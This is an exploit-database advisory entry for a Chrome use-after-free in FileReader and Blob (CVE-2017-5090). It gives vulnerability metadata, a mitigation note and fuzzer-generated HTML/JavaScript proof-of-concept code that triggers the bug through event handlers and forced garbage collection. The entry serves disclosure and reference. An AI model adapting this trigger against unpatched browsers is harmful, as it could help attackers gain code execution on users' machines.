Vendor: Chrome
By: Project Zero
CVSS: 6.5 (MEDIUM)
CWE: 416 (Use-after-free)
Product Name: Chrome
Affected Version From: Google Chrome prior to version 59
Affected Version To: Google Chrome version 59
Patch Exists: YES
Related CVE: CVE-2017-5090
CPE: a:google:chrome
Platforms Tested: Windows, Linux, Mac
2017

Use-after-free in FileReader and Blob

A use-after-free vulnerability exists in the FileReader and Blob objects in the Google Chrome browser, caused by improper handling of these objects. An attacker can exploit it to execute arbitrary code in the context of the browser.

Mitigation:

Google has released a patch to address the vulnerability.

Exploit-DB raw data:

<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=827
-->

<script>
function eventhandler1() {
  CollectGarbage();
}

function eventhandler5() {
  try { /*FileReader*/ var var00063 = new FileReader(); } catch(err) { } //line 68
  try { /*Blob*/ var var00064 = new Blob(); } catch(err) { } //line 69
  try { var00063.readAsDataURL(var00064); } catch(err) { } //line 70
}
</script>

</noembed>
<applet onmouseout="eventhandler6()" truespeed="-1.86811e+009" spellcheck="A" frameborder="all" pluginurl="bottom" link="-32" part="file" ononline="eventhandler1()" onwebkittransitionend="eventhandler10()" onerror="eventhandler5()" char="void" direction="-1">iiThS9l_J8
</xmp>
</select>A7
<object results="object" default="black" aria_checked="1" action="row" onwebkitanimationiteration="eventhandler4()" playcount="bottom" playcount="poly" onsearch="eventhandler4()" oninput="eventhandler9()" translate="left" for="1" checked="-0.155515%" aria_selected="hsides" onerror="eventhandler1()" aria_valuemin="file">